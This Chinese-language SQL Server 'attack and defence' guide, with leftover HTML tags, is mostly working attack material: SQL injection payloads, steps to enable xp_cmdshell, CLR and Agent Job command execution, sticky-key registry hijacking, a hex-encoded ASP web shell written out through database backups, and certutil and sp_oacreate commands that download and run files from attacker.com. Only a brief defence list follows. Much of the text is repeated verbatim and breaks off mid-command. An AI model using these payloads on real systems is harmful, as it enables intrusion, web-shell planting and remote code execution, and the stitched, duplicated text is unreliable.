Microsoft SQL Server数据库攻防完全指南<\/h1>

一、SQL Server环境搭建<\/h2>

1. 安装配置<\/h3>

选择混合模式身份验证，设置密码如1QAZ2wsx<\/code><\/li>
启用TCP\/IP协议，重启SQL Server服务<\/li>
默认使用端口：TCP-1433、UDP-1434<\/li>

开启IIS服务和ASP.NET支持<\/li>
<\/ul>
2. 测试环境搭建<\/h3>

创建数据库：create database FoundStone_Bank<\/code><\/li>
创建表结构：导入提供的SQL脚本<\/li>
部署SQL注入测试页面，修改连接字符串：<\/li>
<\/ol>
private<\/span> static<\/span> string<\/span> strSqlConnectionString = @"SERVER=.;UID=sa;PWD=1QAZ2wsx;DATABASE=FoundStone_Bank"<\/span>;
<\/span><\/span><\/code><\/pre>二、SQL Server基础架构<\/h2>
1. 系统数据库<\/h3>

master<\/strong>：记录系统级信息<\/li>
model<\/strong>：用户数据库模板<\/li>
msdb<\/strong>：存储任务计划、备份恢复信息<\/li>
tempdb<\/strong>：临时对象存储区<\/li>
<\/ul>
2. 对象类型标识<\/h3>



标识<\/th>
对象类型<\/th>
<\/tr>
<\/thead>


C<\/td>
CHECK约束<\/td>
<\/tr>

D<\/td>
默认值约束<\/td>
<\/tr>

F<\/td>
外键约束<\/td>
<\/tr>

FN<\/td>
标量函数<\/td>
<\/tr>

IF<\/td>
内嵌表函数<\/td>
<\/tr>

P<\/td>
存储过程<\/td>
<\/tr>

PK<\/td>
主键约束<\/td>
<\/tr>

S<\/td>
系统表<\/td>
<\/tr>

TF<\/td>
表函数<\/td>
<\/tr>

TR<\/td>
触发器<\/td>
<\/tr>

U<\/td>
用户表<\/td>
<\/tr>

V<\/td>
视图<\/td>
<\/tr>

X<\/td>
扩展存储过程<\/td>
<\/tr>
<\/tbody>
<\/table>
三、SQL Server信息收集技术<\/h2>
1. 基础信息探测<\/h3>
-- 判断当前用户
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> user<\/span>><\/span>0<\/span>; --
<\/span><\/span><\/span><\/span>
<\/span><\/span>-- 判断数据库类型
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> (select<\/span> count<\/span>(*<\/span>) from<\/span> sysobjects)><\/span>0<\/span>  -- MSSQL
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> (select<\/span> count<\/span>(*<\/span>) from<\/span> mysysobjects)><\/span>0<\/span>  -- Access
<\/span><\/span><\/span><\/span>
<\/span><\/span>-- 获取版本信息
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> @@<\/span>version<\/span>)
<\/span><\/span>
<\/span><\/span>-- 获取当前数据库名
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> db_name()><\/span>0<\/span>; --
<\/span><\/span><\/span><\/span>
<\/span><\/span>-- 获取服务名
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> @@<\/span>servername)
<\/span><\/span><\/code><\/pre>2. 权限判断<\/h3>
-- 服务器角色判断
<\/span><\/span><\/span><\/span>and<\/span> 1<\/span>=<\/span>(select<\/span> is_srvrolemember('sysadmin'<\/span>))
<\/span><\/span>and<\/span> 1<\/span>=<\/span>(select<\/span> is_srvrolemember('serveradmin'<\/span>))
<\/span><\/span>
<\/span><\/span>-- 数据库角色判断
<\/span><\/span><\/span><\/span>select<\/span> IS_MEMBER('db_owner'<\/span>)
<\/span><\/span>
<\/span><\/span>-- 数据库访问权限
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> HAS_DBACCESS('master'<\/span>))
<\/span><\/span><\/code><\/pre>四、SQL注入技术详解<\/h2>
1. 手工注入流程<\/h3>
-- 获取表名
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> top 1<\/span> name from<\/span> sysobjects where<\/span> xtype=<\/span>'u'<\/span> and<\/span> name!=<\/span>'info'<\/span>)
<\/span><\/span>
<\/span><\/span>-- 获取列名
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> top 1<\/span> name from<\/span> syscolumns where<\/span> id=<\/span>(select<\/span> id from<\/span> sysobjects where<\/span> name=<\/span>'fsb_accounts'<\/span>) and<\/span> name<><\/span>'id'<\/span>)
<\/span><\/span>
<\/span><\/span>-- 获取数据
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> top 1<\/span> account_no from<\/span> fsb_accounts)
<\/span><\/span><\/code><\/pre>2. 报错注入<\/h3>
1<\/span> and<\/span> 1<\/span>=<\/span>convert<\/span>(int,@@<\/span>version<\/span>)
<\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> CAST<\/span>(USER<\/span> as<\/span> int))
<\/span><\/span><\/code><\/pre>3. 盲注技术<\/h3>
-- 布尔盲注
<\/span><\/span><\/span><\/span>1<\/span> and<\/span> ascii(substring<\/span>((select<\/span> top 1<\/span> name from<\/span> master.dbo.sysdatabases),1<\/span>,1<\/span>))>=<\/span>109<\/span>
<\/span><\/span>
<\/span><\/span>-- 时间盲注
<\/span><\/span><\/span><\/span>1<\/span>; if<\/span>(select<\/span> IS_SRVROLEMEMBER('sysadmin'<\/span>))=<\/span>1<\/span> WAITFOR DELAY '0:0:5'<\/span> --
<\/span><\/span><\/span><\/code><\/pre>4. 联合注入<\/h3>

MSSQL联合注入建议使用NULL而非数字占位，避免隐式转换问题<\/li>
<\/ul>
五、危险存储过程利用<\/h2>
1. xp_cmdshell<\/h3>
-- 检查是否存在
<\/span><\/span><\/span><\/span>select<\/span> count<\/span>(*<\/span>) from<\/span> master.dbo.sysobjects where<\/span> xtype=<\/span>'x'<\/span> and<\/span> name=<\/span>'xp_cmdshell'<\/span>
<\/span><\/span>
<\/span><\/span>-- 启用xp_cmdshell
<\/span><\/span><\/span><\/span>exec<\/span> sp_configure 'show advanced options'<\/span>,1<\/span>; reconfigure;
<\/span><\/span>exec<\/span> sp_configure 'xp_cmdshell'<\/span>,1<\/span>; reconfigure;
<\/span><\/span>
<\/span><\/span>-- 执行系统命令
<\/span><\/span><\/span><\/span>exec<\/span> master.dbo.xp_cmdshell 'whoami'<\/span>
<\/span><\/span>exec<\/span> master..xp_cmdshell 'systeminfo | findstr \/B \/C:"OS Name"'<\/span>
<\/span><\/span><\/code><\/pre>2. 注册表操作<\/h3>
-- 读取注册表
<\/span><\/span><\/span><\/span>exec<\/span> xp_regread 'HKEY_LOCAL_MACHINE'<\/span>,'SOFTWARE\Microsoft\Jet\4.0\Engines'<\/span>,'SandBoxMode'<\/span>
<\/span><\/span>
<\/span><\/span>-- 写入注册表(劫持粘滞键)
<\/span><\/span><\/span><\/span>exec<\/span> master..xp_regwrite 'HKEY_LOCAL_MACHINE'<\/span>,'SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\sethc.EXE'<\/span>,'Debugger'<\/span>,'REG_SZ'<\/span>,'C:\WINDOWS\explorer.exe'<\/span>;
<\/span><\/span><\/code><\/pre>3. 文件系统操作<\/h3>
-- 检查文件存在
<\/span><\/span><\/span><\/span>exec<\/span> xp_fileexist 'C:\Windows\System32\cmd.exe'<\/span>
<\/span><\/span>
<\/span><\/span>-- 列目录
<\/span><\/span><\/span><\/span>exec<\/span> xp_dirtree 'C:\'<\/span>,1<\/span>,1<\/span>
<\/span><\/span>exec<\/span> xp_subdirs 'C:\'<\/span>
<\/span><\/span><\/code><\/pre>六、高级攻击技术<\/h2>
1. CLR集成攻击<\/h3>
-- 启用CLR
<\/span><\/span><\/span><\/span>sp_configure 'show advanced options'<\/span>,1<\/span>; RECONFIGURE;
<\/span><\/span>sp_configure 'clr enabled'<\/span>,1<\/span>; RECONFIGURE;
<\/span><\/span>ALTER<\/span> DATABASE<\/span> master SET<\/span> TRUSTWORTHY ON<\/span>;
<\/span><\/span>
<\/span><\/span>-- 导入程序集
<\/span><\/span><\/span><\/span>CREATE<\/span> ASSEMBLY [mssql_CLR] FROM<\/span> 0<\/span>x4D5A... WITH<\/span> PERMISSION_SET=<\/span>UNSAFE;
<\/span><\/span>
<\/span><\/span>-- 创建存储过程
<\/span><\/span><\/span><\/span>CREATE<\/span> PROCEDURE<\/span> [dbo].[ExecCommand] @<\/span>cmd NVARCHAR(MAX<\/span>) AS<\/span> EXTERNAL<\/span> NAME [mssql_CLR].[StoredProcedures].[ExecCommand]
<\/span><\/span>
<\/span><\/span>-- 执行命令
<\/span><\/span><\/span><\/span>exec<\/span> dbo.ExecCommand "whoami \/all"<\/span>;
<\/span><\/span><\/code><\/pre>2. SQL Server Agent Job<\/h3>
-- 创建计划任务执行命令
<\/span><\/span><\/span><\/span>USE msdb;
<\/span><\/span>EXEC<\/span> dbo.sp_add_job @<\/span>job_name=<\/span>N'test_powershell_job1'<\/span>;
<\/span><\/span>EXEC<\/span> sp_add_jobstep @<\/span>job_name=<\/span>N'test_powershell_job1'<\/span>, @<\/span>step_name=<\/span>N'test_powershell_name1'<\/span>, 
<\/span><\/span>@<\/span>subsystem=<\/span>N'PowerShell'<\/span>, @<\/span>command=<\/span>N'c:\windows\system32\cmd.exe \/c whoami >c:\\1.txt'<\/span>;
<\/span><\/span>EXEC<\/span> dbo.sp_add_jobserver @<\/span>job_name=<\/span>N'test_powershell_job1'<\/span>;
<\/span><\/span>EXEC<\/span> dbo.sp_start_job N'test_powershell_job1'<\/span>;
<\/span><\/span><\/code><\/pre>3. R\/Python脚本执行<\/h3>
-- 启用外部脚本
<\/span><\/span><\/span><\/span>EXEC<\/span> sp_configure 'external scripts enabled'<\/span>,1<\/span> RECONFIGURE WITH<\/span> OVERRIDE
<\/span><\/span>
<\/span><\/span>-- R脚本执行命令
<\/span><\/span><\/span><\/span>EXEC<\/span> sp_execute_external_script
<\/span><\/span>@<\/span>language<\/span>=<\/span>N'R'<\/span>,
<\/span><\/span>@<\/span>script=<\/span>N'OutputDataSet <- data.frame(system("cmd.exe \/c dir",intern=T))'<\/span>
<\/span><\/span>WITH<\/span> RESULT<\/span> SETS<\/span> (([cmd_out] text));
<\/span><\/span>
<\/span><\/span>-- Python脚本执行命令
<\/span><\/span><\/span><\/span>exec<\/span> sp_execute_external_script 
<\/span><\/span>@<\/span>language<\/span>=<\/span>N'Python'<\/span>, 
<\/span><\/span>@<\/span>script=<\/span>N'import subprocess
<\/span><\/span><\/span>p = subprocess.Popen("cmd.exe \/c whoami", stdout=subprocess.PIPE)
<\/span><\/span><\/span>OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'<\/span>
<\/span><\/span>WITH<\/span> RESULT<\/span> SETS<\/span> (([cmd_out] nvarchar(max<\/span>)))
<\/span><\/span><\/code><\/pre>七、Getshell技术<\/h2>
1. 差异备份Getshell<\/h3>
-- 创建表并插入一句话
<\/span><\/span><\/span><\/span>create<\/span> table<\/span> [dbo].[test]([cmd][image]);
<\/span><\/span>insert<\/span> into<\/span> test(cmd) values<\/span>(0<\/span>x3C25657865637574652872657175657374282261222929253E);
<\/span><\/span>
<\/span><\/span>-- 差异备份
<\/span><\/span><\/span><\/span>backup database<\/span> 库名<\/span> to<\/span> disk=<\/span>'C:\inetpub\wwwroot\shell.asp'<\/span> WITH<\/span> DIFFERENTIAL,FORMAT;
<\/span><\/span><\/code><\/pre>2. 日志备份Getshell<\/h3>
-- 设置恢复模式
<\/span><\/span><\/span><\/span>alter<\/span> database<\/span> 库名<\/span> set<\/span> RECOVERY FULL<\/span>
<\/span><\/span>
<\/span><\/span>-- 创建表并插入一句话
<\/span><\/span><\/span><\/span>create<\/span> table<\/span> cmd(a image)
<\/span><\/span>backup log 库名<\/span> to<\/span> disk=<\/span>'c:\xxx'<\/span> with<\/span> init
<\/span><\/span>insert<\/span> into<\/span> cmd(a) values<\/span>(0<\/span>x3C25657865637574652872657175657374282261222929253E)
<\/span><\/span>backup log 库名<\/span> to<\/span> disk=<\/span>'c:\xxx\2.asp'<\/span>
<\/span><\/span><\/code><\/pre>八、提权技术<\/h2>
1. 利用xp_cmdshell下载执行<\/h3>
exec<\/span> master.dbo.xp_cmdshell 'cd c:\www & certutil -urlcache -split -f http:\/\/attacker.com\/file.exe'<\/span>
<\/span><\/span>exec<\/span> master.dbo.xp_cmdshell 'cd c:\www & file.exe'<\/span>
<\/span><\/span><\/code><\/pre>2. 利用sp_oacreate<\/h3>
-- 启用Ole Automation Procedures
<\/span><\/span><\/span><\/span>EXEC<\/span> sp_configure 'show advanced options'<\/span>,1<\/span>; RECONFIGURE WITH<\/span> OVERRIDE;
<\/span><\/span>EXEC<\/span> sp_configure 'Ole Automation Procedures'<\/span>,1<\/span>; RECONFIGURE WITH<\/span> OVERRIDE;
<\/span><\/span>
<\/span><\/span>-- 下载文件
<\/span><\/span><\/span><\/span>DECLARE<\/span> @<\/span>B varbinary(8000<\/span>),@<\/span>hr int,@<\/span>http INT,@<\/span>down INT
<\/span><\/span>exec<\/span> sp_oacreate [Microsoft.XMLHTTP],@<\/span>http output<\/span>
<\/span><\/span>EXEC<\/span> @<\/span>hr =<\/span> sp_oamethod @<\/span>http,[Open<\/span>],null<\/span>,[GET<\/span>],[http:\/\/<\/span>attacker.com\/<\/span>shell.txt],0<\/span>
<\/span><\/span>EXEC<\/span> @<\/span>hr =<\/span> sp_oamethod @<\/span>http,[Send],null<\/span>
<\/span><\/span>EXEC<\/span> @<\/span>hr =<\/span> sp_OAGetProperty @<\/span>http,[responseBody],@<\/span>B output<\/span>
<\/span><\/span>exec<\/span> sp_oacreate [ADODB.Stream],@<\/span>down output<\/span>
<\/span><\/span>exec<\/span> sp_OASetProperty @<\/span>down,[Type<\/span>],1<\/span>
<\/span><\/span>exec<\/span> sp_OASetProperty @<\/span>down,[mode<\/span>],3<\/span>
<\/span><\/span>exec<\/span> sp_oamethod @<\/span>down,[Open<\/span>],null<\/span>
<\/span><\/span>exec<\/span> sp_oamethod @<\/span>down,[Write<\/span>],null<\/span>,@<\/span>B
<\/span><\/span>exec<\/span> sp_oamethod @<\/span>down,[SaveToFile],null<\/span>,[C<\/span>:\<\/span>test\<\/span>s.aspx],1<\/span>
<\/span><\/span><\/code><\/pre>九、PowerUpSQL工具使用<\/h2>
1. 发现SQL实例<\/h3>
# 本地实例发现<\/span>
<\/span><\/span>Get-SQLInstanceLocal -Verbose
<\/span><\/span>
<\/span><\/span># 域内实例发现<\/span>
<\/span><\/span>Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password 1QAZ2wsx
<\/span><\/span><\/code><\/pre>2. 提权与命令执行<\/h3>
# 提权为sysadmin<\/span>
<\/span><\/span>Invoke-SQLEscalatePriv -Verbose -Instance SQLServer1
<\/span><\/span>
<\/span><\/span># 使用xp_cmdshell执行命令<\/span>
<\/span><\/span>$Targets | Invoke-SQLOSCmd -Verbose -Command "Whoami"<\/span> -Threads 10
<\/span><\/span>
<\/span><\/span># CLR执行命令<\/span>
<\/span><\/span>$Targets | Invoke-SQLOSCLR -Verbose -Command "Whoami"<\/span>
<\/span><\/span>
<\/span><\/span># Agent Job执行命令<\/span>
<\/span><\/span>$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem CmdExec -Command "echo hello > c:\temp\test.txt"<\/span>
<\/span><\/span><\/code><\/pre>十、防御建议<\/h2>

最小权限原则<\/strong>：应用程序账户使用最低必要权限<\/li>
禁用危险组件<\/strong>：禁用xp_cmdshell、Ole Automation Procedures等<\/li>
输入验证<\/strong>：对所有用户输入进行严格过滤<\/li>
错误处理<\/strong>：自定义错误页面，避免泄露系统信息<\/li>
定期审计<\/strong>：检查存储过程和扩展存储过程的使用情况<\/li>
更新补丁<\/strong>：及时安装SQL Server安全更新<\/li>
网络隔离<\/strong>：限制SQL Server的网络访问权限<\/li>
日志监控<\/strong>：启用并监控SQL Server的登录和操作日志<\/li>
<\/ol>
通过本指南，您已全面掌握SQL Server从基础到高级的攻防技术。请务必在合法授权范围内使用这些技术，并加强自身系统的安全防护。<\/p>

标识<\/th>	对象类型<\/th> <\/tr> <\/thead>
C<\/td>	CHECK约束<\/td> <\/tr>
D<\/td>	默认值约束<\/td> <\/tr>
F<\/td>	外键约束<\/td> <\/tr>
FN<\/td>	标量函数<\/td> <\/tr>
IF<\/td>	内嵌表函数<\/td> <\/tr>
P<\/td>	存储过程<\/td> <\/tr>
PK<\/td>	主键约束<\/td> <\/tr>
S<\/td>	系统表<\/td> <\/tr>
TF<\/td>	表函数<\/td> <\/tr>
TR<\/td>	触发器<\/td> <\/tr>
U<\/td>	用户表<\/td> <\/tr>
V<\/td>	视图<\/td> <\/tr>
X<\/td>	扩展存储过程<\/td> <\/tr> <\/tbody> <\/table> 三、SQL Server信息收集技术<\/h2> 1. 基础信息探测<\/h3> -- 判断当前用户 <\/span><\/span><\/span><\/span>1<\/span> and<\/span> user<\/span>><\/span>0<\/span>; -- <\/span><\/span><\/span><\/span> <\/span><\/span>-- 判断数据库类型 <\/span><\/span><\/span><\/span>1<\/span> and<\/span> (select<\/span> count<\/span>(<\/span>) from<\/span> sysobjects)><\/span>0<\/span> -- MSSQL <\/span><\/span><\/span><\/span>1<\/span> and<\/span> (select<\/span> count<\/span>(<\/span>) from<\/span> mysysobjects)><\/span>0<\/span> -- Access <\/span><\/span><\/span><\/span> <\/span><\/span>-- 获取版本信息 <\/span><\/span><\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> @@<\/span>version<\/span>) <\/span><\/span> <\/span><\/span>-- 获取当前数据库名 <\/span><\/span><\/span><\/span>1<\/span> and<\/span> db_name()><\/span>0<\/span>; -- <\/span><\/span><\/span><\/span> <\/span><\/span>-- 获取服务名 <\/span><\/span><\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> @@<\/span>servername) <\/span><\/span><\/code><\/pre>2. 权限判断<\/h3> -- 服务器角色判断 <\/span><\/span><\/span><\/span>and<\/span> 1<\/span>=<\/span>(select<\/span> is_srvrolemember('sysadmin'<\/span>)) <\/span><\/span>and<\/span> 1<\/span>=<\/span>(select<\/span> is_srvrolemember('serveradmin'<\/span>)) <\/span><\/span> <\/span><\/span>-- 数据库角色判断 <\/span><\/span><\/span><\/span>select<\/span> IS_MEMBER('db_owner'<\/span>) <\/span><\/span> <\/span><\/span>-- 数据库访问权限 <\/span><\/span><\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> HAS_DBACCESS('master'<\/span>)) <\/span><\/span><\/code><\/pre>四、SQL注入技术详解<\/h2> 1. 手工注入流程<\/h3> -- 获取表名 <\/span><\/span><\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> top 1<\/span> name from<\/span> sysobjects where<\/span> xtype=<\/span>'u'<\/span> and<\/span> name!=<\/span>'info'<\/span>) <\/span><\/span> <\/span><\/span>-- 获取列名 <\/span><\/span><\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> top 1<\/span> name from<\/span> syscolumns where<\/span> id=<\/span>(select<\/span> id from<\/span> sysobjects where<\/span> name=<\/span>'fsb_accounts'<\/span>) and<\/span> name<><\/span>'id'<\/span>) <\/span><\/span> <\/span><\/span>-- 获取数据 <\/span><\/span><\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> top 1<\/span> account_no from<\/span> fsb_accounts) <\/span><\/span><\/code><\/pre>2. 报错注入<\/h3> 1<\/span> and<\/span> 1<\/span>=<\/span>convert<\/span>(int,@@<\/span>version<\/span>) <\/span><\/span>1<\/span> and<\/span> 1<\/span>=<\/span>(select<\/span> CAST<\/span>(USER<\/span> as<\/span> int)) <\/span><\/span><\/code><\/pre>3. 盲注技术<\/h3> -- 布尔盲注 <\/span><\/span><\/span><\/span>1<\/span> and<\/span> ascii(substring<\/span>((select<\/span> top 1<\/span> name from<\/span> master.dbo.sysdatabases),1<\/span>,1<\/span>))>=<\/span>109<\/span> <\/span><\/span> <\/span><\/span>-- 时间盲注 <\/span><\/span><\/span><\/span>1<\/span>; if<\/span>(select<\/span> IS_SRVROLEMEMBER('sysadmin'<\/span>))=<\/span>1<\/span> WAITFOR DELAY '0:0:5'<\/span> -- <\/span><\/span><\/span><\/code><\/pre>4. 联合注入<\/h3> MSSQL联合注入建议使用NULL而非数字占位，避免隐式转换问题<\/li> <\/ul> 五、危险存储过程利用<\/h2> 1. xp_cmdshell<\/h3> -- 检查是否存在 <\/span><\/span><\/span><\/span>select<\/span> count<\/span>(*<\/span>) from<\/span> master.dbo.sysobjects where<\/span> xtype=<\/span>'x'<\/span> and<\/span> name=<\/span>'xp_cmdshell'<\/span> <\/span><\/span> <\/span><\/span>-- 启用xp_cmdshell <\/span><\/span><\/span><\/span>exec<\/span> sp_configure 'show advanced options'<\/span>,1<\/span>; reconfigure; <\/span><\/span>exec<\/span> sp_configure 'xp_cmdshell'<\/span>,1<\/span>; reconfigure; <\/span><\/span> <\/span><\/span>-- 执行系统命令 <\/span><\/span><\/span><\/span>exec<\/span> master.dbo.xp_cmdshell 'whoami'<\/span> <\/span><\/span>exec<\/span> master..xp_cmdshell 'systeminfo \| findstr \/B \/C:"OS Name"'<\/span> <\/span><\/span><\/code><\/pre>2. 注册表操作<\/h3> -- 读取注册表 <\/span><\/span><\/span><\/span>exec<\/span> xp_regread 'HKEY_LOCAL_MACHINE'<\/span>,'SOFTWARE\Microsoft\Jet\4.0\Engines'<\/span>,'SandBoxMode'<\/span> <\/span><\/span> <\/span><\/span>-- 写入注册表(劫持粘滞键) <\/span><\/span><\/span><\/span>exec<\/span> master..xp_regwrite 'HKEY_LOCAL_MACHINE'<\/span>,'SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\sethc.EXE'<\/span>,'Debugger'<\/span>,'REG_SZ'<\/span>,'C:\WINDOWS\explorer.exe'<\/span>; <\/span><\/span><\/code><\/pre>3. 文件系统操作<\/h3> -- 检查文件存在 <\/span><\/span><\/span><\/span>exec<\/span> xp_fileexist 'C:\Windows\System32\cmd.exe'<\/span> <\/span><\/span> <\/span><\/span>-- 列目录 <\/span><\/span><\/span><\/span>exec<\/span> xp_dirtree 'C:\'<\/span>,1<\/span>,1<\/span> <\/span><\/span>exec<\/span> xp_subdirs 'C:\'<\/span> <\/span><\/span><\/code><\/pre>六、高级攻击技术<\/h2> 1. CLR集成攻击<\/h3> -- 启用CLR <\/span><\/span><\/span><\/span>sp_configure 'show advanced options'<\/span>,1<\/span>; RECONFIGURE; <\/span><\/span>sp_configure 'clr enabled'<\/span>,1<\/span>; RECONFIGURE; <\/span><\/span>ALTER<\/span> DATABASE<\/span> master SET<\/span> TRUSTWORTHY ON<\/span>; <\/span><\/span> <\/span><\/span>-- 导入程序集 <\/span><\/span><\/span><\/span>CREATE<\/span> ASSEMBLY [mssql_CLR] FROM<\/span> 0<\/span>x4D5A... WITH<\/span> PERMISSION_SET=<\/span>UNSAFE; <\/span><\/span> <\/span><\/span>-- 创建存储过程 <\/span><\/span><\/span><\/span>CREATE<\/span> PROCEDURE<\/span> [dbo].[ExecCommand] @<\/span>cmd NVARCHAR(MAX<\/span>) AS<\/span> EXTERNAL<\/span> NAME [mssql_CLR].[StoredProcedures].[ExecCommand] <\/span><\/span> <\/span><\/span>-- 执行命令 <\/span><\/span><\/span><\/span>exec<\/span> dbo.ExecCommand "whoami \/all"<\/span>; <\/span><\/span><\/code><\/pre>2. SQL Server Agent Job<\/h3> -- 创建计划任务执行命令 <\/span><\/span><\/span><\/span>USE msdb; <\/span><\/span>EXEC<\/span> dbo.sp_add_job @<\/span>job_name=<\/span>N'test_powershell_job1'<\/span>; <\/span><\/span>EXEC<\/span> sp_add_jobstep @<\/span>job_name=<\/span>N'test_powershell_job1'<\/span>, @<\/span>step_name=<\/span>N'test_powershell_name1'<\/span>, <\/span><\/span>@<\/span>subsystem=<\/span>N'PowerShell'<\/span>, @<\/span>command=<\/span>N'c:\windows\system32\cmd.exe \/c whoami >c:\\1.txt'<\/span>; <\/span><\/span>EXEC<\/span> dbo.sp_add_jobserver @<\/span>job_name=<\/span>N'test_powershell_job1'<\/span>; <\/span><\/span>EXEC<\/span> dbo.sp_start_job N'test_powershell_job1'<\/span>; <\/span><\/span><\/code><\/pre>3. R\/Python脚本执行<\/h3> -- 启用外部脚本 <\/span><\/span><\/span><\/span>EXEC<\/span> sp_configure 'external scripts enabled'<\/span>,1<\/span> RECONFIGURE WITH<\/span> OVERRIDE <\/span><\/span> <\/span><\/span>-- R脚本执行命令 <\/span><\/span><\/span><\/span>EXEC<\/span> sp_execute_external_script <\/span><\/span>@<\/span>language<\/span>=<\/span>N'R'<\/span>, <\/span><\/span>@<\/span>script=<\/span>N'OutputDataSet <- data.frame(system("cmd.exe \/c dir",intern=T))'<\/span> <\/span><\/span>WITH<\/span> RESULT<\/span> SETS<\/span> (([cmd_out] text)); <\/span><\/span> <\/span><\/span>-- Python脚本执行命令 <\/span><\/span><\/span><\/span>exec<\/span> sp_execute_external_script <\/span><\/span>@<\/span>language<\/span>=<\/span>N'Python'<\/span>, <\/span><\/span>@<\/span>script=<\/span>N'import subprocess <\/span><\/span><\/span>p = subprocess.Popen("cmd.exe \/c whoami", stdout=subprocess.PIPE) <\/span><\/span><\/span>OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'<\/span> <\/span><\/span>WITH<\/span> RESULT<\/span> SETS<\/span> (([cmd_out] nvarchar(max<\/span>))) <\/span><\/span><\/code><\/pre>七、Getshell技术<\/h2> 1. 差异备份Getshell<\/h3> -- 创建表并插入一句话 <\/span><\/span><\/span><\/span>create<\/span> table<\/span> [dbo].[test]([cmd][image]); <\/span><\/span>insert<\/span> into<\/span> test(cmd) values<\/span>(0<\/span>x3C25657865637574652872657175657374282261222929253E); <\/span><\/span> <\/span><\/span>-- 差异备份 <\/span><\/span><\/span><\/span>backup database<\/span> 库名<\/span> to<\/span> disk=<\/span>'C:\inetpub\wwwroot\shell.asp'<\/span> WITH<\/span> DIFFERENTIAL,FORMAT; <\/span><\/span><\/code><\/pre>2. 日志备份Getshell<\/h3> -- 设置恢复模式 <\/span><\/span><\/span><\/span>alter<\/span> database<\/span> 库名<\/span> set<\/span> RECOVERY FULL<\/span> <\/span><\/span> <\/span><\/span>-- 创建表并插入一句话 <\/span><\/span><\/span><\/span>create<\/span> table<\/span> cmd(a image) <\/span><\/span>backup log 库名<\/span> to<\/span> disk=<\/span>'c:\xxx'<\/span> with<\/span> init <\/span><\/span>insert<\/span> into<\/span> cmd(a) values<\/span>(0<\/span>x3C25657865637574652872657175657374282261222929253E) <\/span><\/span>backup log 库名<\/span> to<\/span> disk=<\/span>'c:\xxx\2.asp'<\/span> <\/span><\/span><\/code><\/pre>八、提权技术<\/h2> 1. 利用xp_cmdshell下载执行<\/h3> exec<\/span> master.dbo.xp_cmdshell 'cd c:\www & certutil -urlcache -split -f http:\/\/attacker.com\/file.exe'<\/span> <\/span><\/span>exec<\/span> master.dbo.xp_cmdshell 'cd c:\www & file.exe'<\/span> <\/span><\/span><\/code><\/pre>2. 利用sp_oacreate<\/h3> -- 启用Ole Automation Procedures <\/span><\/span><\/span><\/span>EXEC<\/span> sp_configure 'show advanced options'<\/span>,1<\/span>; RECONFIGURE WITH<\/span> OVERRIDE; <\/span><\/span>EXEC<\/span> sp_configure 'Ole Automation Procedures'<\/span>,1<\/span>; RECONFIGURE WITH<\/span> OVERRIDE; <\/span><\/span> <\/span><\/span>-- 下载文件 <\/span><\/span><\/span><\/span>DECLARE<\/span> @<\/span>B varbinary(8000<\/span>),@<\/span>hr int,@<\/span>http INT,@<\/span>down INT <\/span><\/span>exec<\/span> sp_oacreate [Microsoft.XMLHTTP],@<\/span>http output<\/span> <\/span><\/span>EXEC<\/span> @<\/span>hr =<\/span> sp_oamethod @<\/span>http,[Open<\/span>],null<\/span>,[GET<\/span>],[http:\/\/<\/span>attacker.com\/<\/span>shell.txt],0<\/span> <\/span><\/span>EXEC<\/span> @<\/span>hr =<\/span> sp_oamethod @<\/span>http,[Send],null<\/span> <\/span><\/span>EXEC<\/span> @<\/span>hr =<\/span> sp_OAGetProperty @<\/span>http,[responseBody],@<\/span>B output<\/span> <\/span><\/span>exec<\/span> sp_oacreate [ADODB.Stream],@<\/span>down output<\/span> <\/span><\/span>exec<\/span> sp_OASetProperty @<\/span>down,[Type<\/span>],1<\/span> <\/span><\/span>exec<\/span> sp_OASetProperty @<\/span>down,[mode<\/span>],3<\/span> <\/span><\/span>exec<\/span> sp_oamethod @<\/span>down,[Open<\/span>],null<\/span> <\/span><\/span>exec<\/span> sp_oamethod @<\/span>down,[Write<\/span>],null<\/span>,@<\/span>B <\/span><\/span>exec<\/span> sp_oamethod @<\/span>down,[SaveToFile],null<\/span>,[C<\/span>:\<\/span>test\<\/span>s.aspx],1<\/span> <\/span><\/span><\/code><\/pre>九、PowerUpSQL工具使用<\/h2> 1. 发现SQL实例<\/h3> # 本地实例发现<\/span> <\/span><\/span>Get-SQLInstanceLocal -Verbose <\/span><\/span> <\/span><\/span># 域内实例发现<\/span> <\/span><\/span>Get-SQLInstanceDomain -Verbose \| Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username sa -password 1QAZ2wsx <\/span><\/span><\/code><\/pre>2. 提权与命令执行<\/h3> # 提权为sysadmin<\/span> <\/span><\/span>Invoke-SQLEscalatePriv -Verbose -Instance SQLServer1 <\/span><\/span> <\/span><\/span># 使用xp_cmdshell执行命令<\/span> <\/span><\/span>$Targets \| Invoke-SQLOSCmd -Verbose -Command "Whoami"<\/span> -Threads 10 <\/span><\/span> <\/span><\/span># CLR执行命令<\/span> <\/span><\/span>$Targets \| Invoke-SQLOSCLR -Verbose 